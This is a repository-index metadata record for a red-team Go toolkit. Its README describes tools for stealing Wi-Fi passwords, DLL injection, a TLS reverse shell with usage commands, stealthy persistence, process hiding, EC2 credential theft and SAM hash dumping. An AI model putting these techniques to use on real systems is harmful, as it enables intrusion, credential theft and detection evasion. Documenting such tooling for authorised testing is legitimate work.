{"id":26140463,"url":"https://github.com/stavinski/malgo","last_synced_at":"2025-03-11T02:53:47.048Z","repository":{"id":65239759,"uuid":"581136075","full_name":"stavinski/malgo","owner":"stavinski","description":"Malicious Go code for red teaming/pentesting","archived":false,"fork":false,"pushed_at":"2023-09-25T13:21:43.000Z","size":2551,"stargazers_count":1,"open_issues_count":0,"forks_count":1,"subscribers_count":1,"default_branch":"main","last_synced_at":"2024-06-21T10:59:20.238Z","etag":null,"topics":["cybersecurity","golang","maliciouscode","offensive-security","redteam-tools","redteaming"],"latest_commit_sha":null,"homepage":"","language":"Go","has_issues":false,"has_wiki":null,"has_pages":null,"mirror_url":null,"source_name":null,"license":null,"status":null,"scm":"git","pull_requests_enabled":true,"icon_url":"https://github.com/stavinski.png","metadata":{"files":{"readme":"README.md","changelog":null,"contributing":null,"funding":null,"license":null,"code_of_conduct":null,"threat_model":null,"audit":null,"citation":null,"codeowners":null,"security":null,"support":null,"governance":null,"roadmap":null,"authors":null,"dei":null,"publiccode":null,"codemeta":null}},"created_at":"2022-12-22T11:17:37.000Z","updated_at":"2024-03-22T10:29:19.000Z","dependencies_parsed_at":"2024-06-21T10:09:16.962Z","dependency_job_id":null,"html_url":"https://github.com/stavinski/malgo","commit_stats":{"total_commits":28,"total_committers":1,"mean_commits":28.0,"dds":0.0,"last_synced_commit":"fddd950efffc9e27ea2350ba92924f7b36f19d2f"},"previous_names":[],"tags_count":0,"template":false,"template_full_name":null,"repository_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/stavinski%2Fmalgo","tags_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/stavinski%2Fmalgo/tags","releases_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/stavinski%2Fmalgo/releases","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/stavinski%2Fmalgo/manifests","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/stavinski","download_url":"https://codeload.github.com/stavinski/malgo/tar.gz/refs/heads/main","host":{"name":"GitHub","url":"https://github.com","kind":"github","repositories_count":242961740,"owners_count":20213316,"icon_url":"https://github.com/github.png","version":null,"created_at":"2022-05-30T11:31:42.601Z","updated_at":"2022-07-04T15:15:14.044Z","host_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories","repository_names_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repository_names","owners_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners"}},"keywords":["cybersecurity","golang","maliciouscode","offensive-security","redteam-tools","redteaming"],"created_at":"2025-03-11T02:53:46.401Z","updated_at":"2025-03-11T02:53:47.035Z","avatar_url":"https://github.com/stavinski.png","language":"Go","funding_links":[],"categories":[],"sub_categories":[],"readme":"# Mal(icous)Go\n\n## Disclaimer\n\nShould only be used for systems that you have explicit permission to target, I take no responsibility for actions performed using any code from this repository.\n\nUse at your own risk! \n\n## wifi pwds\n\nRetrieve WLAN passwords from Windows. Uses native calls in Win32 API rather than executing `netsh wlan ...` as a command, this approach is more stealthy!\n\n## inject\n\nInjects a DLL into a remote process uses the classic on disk / `LoadLibrary` approach so should be used primarily for testing as it is not opsec safe.\n\nUsage:\n\n~~~\ninject_x64.exe \u003cdll_path\u003e \u003cpid\u003e\n~~~\n\n## rshell\n\nSimple reverse shell implementation client supports comms over TLS using the `tlsserver.go` server code.\n\n### client\n\n_Certificate is embedded into the compiled binary, update to a newly created cert._\n\n~~~\nclient -tls -port 4444 \u003chost\u003e\n~~~\n\n### server\n\n~~~\ntlsserver -port 4444 \u003ccert\u003e \u003ckey\u003e\n~~~\n\n## proxy\n\nSimple TCP proxy\n\n~~~\nproxy \u003cport\u003e \u003chost:port\u003e\n~~~\n\n## persistence\n\nA PoC to test adding a scheduled task into windows via COM/OLE rather than the noisey approach of using `schtasks.exe`. Please adjust to your needs!\n\n## hideproc\n\nUses IAT hooking to hook into the low level `NtQuerySystemInformation` function import from `ntdll.dll` and hide processes based on an image name. Also includes a test executable to test against. Simply inject the DLL into the process you want to hide processes from.\n\nAlso demonstrates being able to read the PE including the IAT entries in-memory.\n\nCode could be adjusted to perform other tasks.\n\n## imdsdump\n\nFind yourself on an EC2 instance with an assigned role?! This will use the IMDS to retrieve the temporary creds. Useful if the EC2 host is locked down making it tricky to call the service using other methods and also supports working against IMDSv2 that requires a token.\n\nCompiles to an exe however the code could be changed and compiled as a DLL to be used in-memory to be more stealty or when app blocking is in place.\n\n## samdump\n\nDumps the SAM \u0026 SYSTEM registry hives using Win32 API calls to allow offline cracking of the password hashes. More stealthy than using the reg commands or a well known program.\n\nUsage:\n\n~~~\nsamdump_x64.exe \u003cdir\u003e\n~~~\n","project_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2Fstavinski%2Fmalgo","html_url":"https://awesome.ecosyste.ms/projects/github.com%2Fstavinski%2Fmalgo","lists_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2Fstavinski%2Fmalgo/lists"}